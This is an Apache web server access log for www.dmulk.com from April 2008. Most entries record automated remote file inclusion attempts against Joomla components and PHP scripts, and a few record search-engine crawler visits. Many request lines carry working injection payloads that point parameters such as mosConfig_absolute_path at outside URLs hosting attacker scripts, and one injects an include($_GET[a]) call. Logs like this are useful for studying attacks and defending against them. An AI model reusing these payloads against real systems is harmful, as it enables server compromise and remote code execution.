69.93.107.242 - - [08/Apr/2008:10:15:35 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/belahan.memek/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.240.211.107 - - [08/Apr/2008:10:15:37 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:10:15:37 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.97 - - [08/Apr/2008:10:15:38 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/reyen/id.txt? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.97 - - [08/Apr/2008:10:15:39 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/reyen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.119 - - [08/Apr/2008:10:15:51 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.31.126 - - [08/Apr/2008:10:15:52 -0700] "GET /minamijewelry/source_images/batch1/?S=D HTTP/1.0" 200 5016 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.58.133.62 - - [08/Apr/2008:10:15:58 -0700] "GET /logs/access_080223.log/joomla/index.php?option=com_restaurante&task=http://www.xdengue.xpg.com.br/sefe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.133.62 - - [08/Apr/2008:10:15:58 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.xdengue.xpg.com.br/sefe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.133.62 - - [08/Apr/2008:10:16:08 -0700] "GET /logs/access_080329.log/joomla/index.php?option=com_restaurante&task=http://www.xdengue.xpg.com.br/sefe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.130.242.135 - - [08/Apr/2008:10:16:26 -0700] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [08/Apr/2008:10:16:26 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [08/Apr/2008:10:16:27 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [08/Apr/2008:10:16:27 -0700] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.34.78.106 - - [08/Apr/2008:10:16:32 -0700] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [08/Apr/2008:10:16:33 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [08/Apr/2008:10:16:33 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.186.1.54 - - [08/Apr/2008:10:16:45 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [08/Apr/2008:10:16:45 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
195.34.78.106 - - [08/Apr/2008:10:16:45 -0700] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.97 - - [08/Apr/2008:10:16:47 -0700] "GET /logs/access_071209.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/reyen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.65.76.195 - - [08/Apr/2008:10:17:26 -0700] "GET /logs/access.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.65.76.195 - - [08/Apr/2008:10:17:28 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.65.76.195 - - [08/Apr/2008:10:17:30 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.138.111 - - [08/Apr/2008:10:18:23 -0700] "GET /logs/index.php?text=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
207.58.138.111 - - [08/Apr/2008:10:18:23 -0700] "GET /index.php?text=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 200 7371 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
87.118.96.80 - - [08/Apr/2008:10:18:34 -0700] "GET /logs/access_080118.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.96.80 - - [08/Apr/2008:10:18:34 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.96.80 - - [08/Apr/2008:10:18:34 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.50.100.222 - - [08/Apr/2008:10:18:45 -0700] "GET /logs/access_080216.log//matic/include/libchart-1.1/libchart.php?tm_includepath=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.240.211.107 - - [08/Apr/2008:10:18:49 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.30.216.91 - - [08/Apr/2008:10:18:52 -0700] "GET /logs/access_080312.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.240.211.107 - - [08/Apr/2008:10:18:54 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.240.211.107 - - [08/Apr/2008:10:18:55 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.214.214 - - [08/Apr/2008:10:18:59 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://www.scadi.cl/.setan/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.118.96.80 - - [08/Apr/2008:10:18:59 -0700] "GET /logs/access_080123.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.186.1.54 - - [08/Apr/2008:10:19:09 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [08/Apr/2008:10:19:09 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [08/Apr/2008:10:19:10 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [08/Apr/2008:10:19:10 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [08/Apr/2008:10:19:11 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [08/Apr/2008:10:19:12 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
202.145.0.44 - - [08/Apr/2008:10:19:14 -0700] "GET /logs/access_080218.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://weekly.wassla.com/modules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.145.0.44 - - [08/Apr/2008:10:19:14 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://weekly.wassla.com/modules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.145.0.44 - - [08/Apr/2008:10:19:15 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://weekly.wassla.com/modules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.162.238.35 - - [08/Apr/2008:10:19:16 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.240.211.107 - - [08/Apr/2008:10:19:24 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.186.1.54 - - [08/Apr/2008:10:19:43 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [08/Apr/2008:10:19:43 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
70.84.7.82 - - [08/Apr/2008:10:20:34 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/koeluna/asik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.118.96.80 - - [08/Apr/2008:10:20:40 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [08/Apr/2008:10:21:23 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.135 - - [08/Apr/2008:10:21:31 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.16 - - [08/Apr/2008:10:21:56 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://xdengue01.iespana.es/bds/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.222.36.82 - - [08/Apr/2008:10:22:07 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://61.129.163.4/on.txt?????? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:10:23:39 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:10:23:39 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:10:23:40 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.198.149.41 - - [08/Apr/2008:10:23:46 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.redladys.net/tgp/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.92.158.55 - - [08/Apr/2008:10:24:02 -0700] "GET /logs/access_080313.log/components/com_simpleboard/image_upload.php?sbp=http://northamptonsoccer.com/site/language/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:10:24:09 -0700] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/belahan.memek/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:10:24:10 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/belahan.memek/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:10:24:10 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:10:24:11 -0700] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/belahan.memek/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.118.96.80 - - [08/Apr/2008:10:25:03 -0700] "GET /logs/access_080214.log/admin_modules/admin_module_captions.inc.php?http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.96.80 - - [08/Apr/2008:10:25:03 -0700] "GET /admin_modules/admin_module_captions.inc.php?http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.96.80 - - [08/Apr/2008:10:25:04 -0700] "GET /logs/admin_modules/admin_module_captions.inc.php?http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.145.0.44 - - [08/Apr/2008:10:25:24 -0700] "GET /logs/access_080308.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://weekly.wassla.com/modules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.12.119.178 - - [08/Apr/2008:10:26:48 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.12.119.178 - - [08/Apr/2008:10:26:49 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.232.51.146 - - [08/Apr/2008:10:27:54 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/belahan.memek/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.222.36.82 - - [08/Apr/2008:10:28:48 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://61.129.163.4/on.txt?????? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
61.222.36.82 - - [08/Apr/2008:10:28:59 -0700] "GET /logs/access_071217.log//skin/zero_vote/ask_password.php?dir=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.222.36.82 - - [08/Apr/2008:10:29:02 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.222.36.82 - - [08/Apr/2008:10:29:06 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.162.238.35 - - [08/Apr/2008:10:29:14 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [08/Apr/2008:10:29:14 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [08/Apr/2008:10:29:15 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [08/Apr/2008:10:30:03 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.16 - - [08/Apr/2008:10:30:04 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://xdengue01.iespana.es/bds/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
60.249.42.221 - - [08/Apr/2008:10:30:38 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 200 4139 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.130.70 - - [08/Apr/2008:10:31:12 -0700] "GET /logs/access_080215.log/http://www.alex8212.altervista.org/L4M3R0/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.130.70 - - [08/Apr/2008:10:31:12 -0700] "GET /http://www.alex8212.altervista.org/L4M3R0/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.130.70 - - [08/Apr/2008:10:31:13 -0700] "GET /logs/http://www.alex8212.altervista.org/L4M3R0/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.12.119.178 - - [08/Apr/2008:10:31:56 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.12.119.178 - - [08/Apr/2008:10:31:57 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.12.119.178 - - [08/Apr/2008:10:31:58 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.12.119.178 - - [08/Apr/2008:10:32:06 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.12.119.178 - - [08/Apr/2008:10:32:07 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.12.119.178 - - [08/Apr/2008:10:32:08 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.12.119.178 - - [08/Apr/2008:10:32:45 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:10:32:52 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/belahan.memek/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.12.119.178 - - [08/Apr/2008:10:32:55 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.8.93 - - [08/Apr/2008:10:33:39 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.26.120 - - [08/Apr/2008:10:33:40 -0700] "GET /bikes/dteel/2008_02_16/?S=D HTTP/1.0" 200 1680 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.57.130.70 - - [08/Apr/2008:10:33:48 -0700] "GET /logs/access_080312.log/http://www.alex8212.altervista.org/L4M3R0/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.12.42 - - [08/Apr/2008:10:33:49 -0700] "GET /tmp/?D=D HTTP/1.0" 200 1319 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.57.130.70 - - [08/Apr/2008:10:34:01 -0700] "GET /http://www.alex8212.altervista.org/L4M3R0/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.198.149.41 - - [08/Apr/2008:10:34:46 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.redladys.net/tgp/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:10:34:57 -0700] "GET /logs/access_080329.log//citywriter/head.php?path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:10:34:57 -0700] "GET //citywriter/head.php?path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:10:34:58 -0700] "GET /logs//citywriter/head.php?path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.55.209.206 - - [08/Apr/2008:10:35:04 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.206 - - [08/Apr/2008:10:35:04 -0700] "GET /hms/ HTTP/1.1" 401 395 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:10:35:12 -0700] "GET /logs/access.log//citywriter/head.php?path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.37.167 - - [08/Apr/2008:10:35:44 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.37.167 - - [08/Apr/2008:10:35:44 -0700] "GET /logs/access_071106.log HTTP/1.0" 200 29238 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.37.167 - - [08/Apr/2008:10:35:47 -0700] "GET /logs/access_080221.log HTTP/1.0" 200 1367346 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.96.247.163 - - [08/Apr/2008:10:36:11 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://statesidelogistics.com/images/sistem.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.96.247.163 - - [08/Apr/2008:10:36:12 -0700] "GET //ashnews.php?pathtoashnews=http://statesidelogistics.com/images/sistem.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.96.247.163 - - [08/Apr/2008:10:36:13 -0700] "GET /logs//ashnews.php?pathtoashnews=http://statesidelogistics.com/images/sistem.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.84.7.82 - - [08/Apr/2008:10:36:35 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/koeluna/asik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.7.82 - - [08/Apr/2008:10:36:35 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/koeluna/asik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.96.247.163 - - [08/Apr/2008:10:36:38 -0700] "GET /logs/access_080329.log//ashnews.php?pathtoashnews=http://statesidelogistics.com/images/sistem.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.73.178 - - [08/Apr/2008:10:37:35 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://theninjalegion.com/etc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
